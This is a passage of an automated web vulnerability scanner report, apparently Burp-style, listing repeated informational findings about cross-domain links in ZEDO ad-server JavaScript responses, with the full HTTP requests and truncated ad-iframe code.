document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg="></iframe>
...[SNIP]...

19.36. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=755
Expires: Tue, 06 Sep 2011 15:38:50 GMT
Date: Tue, 06 Sep 2011 15:26:15 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg="></iframe>
...[SNIP]...

19.37. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=676
Expires: Tue, 06 Sep 2011 15:52:56 GMT
Date: Tue, 06 Sep 2011 15:41:40 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg="></iframe>
...[SNIP]...

19.38. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=100
Expires: Tue, 06 Sep 2011 16:09:06 GMT
Date: Tue, 06 Sep 2011 16:07:26 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg="></iframe>
...[SNIP]...

19.39. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Tue, 06 Sep 2011 15:53:52 GMT
Date: Tue, 06 Sep 2011 15:51:56 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg="></iframe>
...[SNIP]...

19.40. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=502
Expires: Tue, 06 Sep 2011 15:24:18 GMT
Date: Tue, 06 Sep 2011 15:15:56 GMT
Content-Length: 1867
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg="></iframe>
...[SNIP]...

19.41. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=&z=7061078845 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Expires: Tue, 06 Sep 2011 15:22:56 GMT
Date: Tue, 06 Sep 2011 15:21:07 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg="></iframe>
...[SNIP]...

19.42. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=&z=1475285476 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=775
Expires: Tue, 06 Sep 2011 16:10:03 GMT
Date: Tue, 06 Sep 2011 15:57:08 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg="></iframe>
...[SNIP]...

19.43. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=&z=8430606850 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=394
Expires: Tue, 06 Sep 2011 15:37:57 GMT
Date: Tue, 06 Sep 2011 15:31:23 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg="></iframe>
...[SNIP]...

19.44. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=&z=8134664386 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
